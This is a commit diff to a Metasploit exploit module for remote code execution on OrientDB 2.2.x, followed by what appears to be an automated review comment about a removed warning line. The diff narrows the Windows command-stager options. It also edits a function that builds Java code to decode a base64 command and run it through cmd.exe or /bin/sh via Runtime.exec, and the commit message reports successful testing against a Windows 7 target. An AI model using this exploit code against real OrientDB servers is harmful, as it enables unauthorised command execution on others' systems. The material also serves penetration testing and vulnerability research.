Orientdb 2.2.x RCE - Changed the java_craft_runtime_exec function; tested the module against Win7-Pro-x64 with OrientDB v2.2.20 using CmdStager flavors vbs and certutil, with success
parent
219987726f
commit
f3f96babb9
@ -34,8 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
[
['Linux', {'Arch' => ARCH_X86, 'Platform' => 'linux' }],
['Unix CMD', {'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => {'BadChars' => "\x22"}}],
# WARNING: Not tested against Windows
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => ['debug_asm','debug_write','vbs','certutil']}]
['Windows', {'Arch' => ARCH_X86, 'Platform' => 'win', 'CmdStagerFlavor' => ['vbs','certutil']}]
],
'DisclosureDate' => 'Jul 13 2017',
'DefaultTarget' => 0))
|
@ -132,18 +131,18 @@ class MetasploitModule < Msf::Exploit::Remote
decoder = Rex::Text.rand_text_alpha(5, 8)
decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
cmd_array = Rex::Text.rand_text_alpha(5, 8)
jcode = "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\\n"
jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\\\"#{Rex::Text.encode_base64(cmd)}\\\");\\n"
jcode << "String [] #{cmd_array} = new String[3];\\n"
jcode = "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
jcode << "String [] #{cmd_array} = new String[3];\n"
if target['Platform'] == 'win'
jcode << "#{cmd_array}[0] = \\\"cmd.exe\\\";\\n"
jcode << "#{cmd_array}[1] = \\\"/c\\\";\\n"
jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"
jcode << "#{cmd_array}[1] = \"/c\";\n"
else
jcode << "#{cmd_array}[0] = \\\"/bin/sh\\\";\\n"
jcode << "#{cmd_array}[1] = \\\"-c\\\";\\n"
jcode << "#{cmd_array}[0] = \"/bin/sh\";\n"
jcode << "#{cmd_array}[1] = \"-c\";\n"
end
jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \\\"UTF-8\\\");\\n"
jcode << "Runtime.getRuntime().exec(#{cmd_array});"
jcode << "#{cmd_array}[2] = new String(#{decoded_bytes}, \"UTF-8\");\n"
jcode << "Runtime.getRuntime().exec(#{cmd_array});\n"
jcode
end
|
|
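Review bot: The `# WARNING: Not tested against Windows` comment is dropped from the target table in the first hunk together with the `debug_asm`/`debug_write` flavors, but the verified configuration the commit message reports (Win7-Pro-x64, OrientDB v2.2.20, flavors vbs and certutil) is not recorded anywhere in the module itself. A reader of the target list can no longer tell why the flavor list shrank or which Windows build the target has actually been exercised against. Consider replacing the removed line with a comment that states the tested scope, e.g. `# Tested: Win7 Pro x64, OrientDB 2.2.20, CmdStagerFlavor vbs and certutil`, or recording it in the module's notes. In the second hunk the body of java_craft_runtime_exec starts outside the hunk, and this rendering does not preserve which of the paired escaped/unescaped jcode lines is the old side, so I have not reviewed that change line by line.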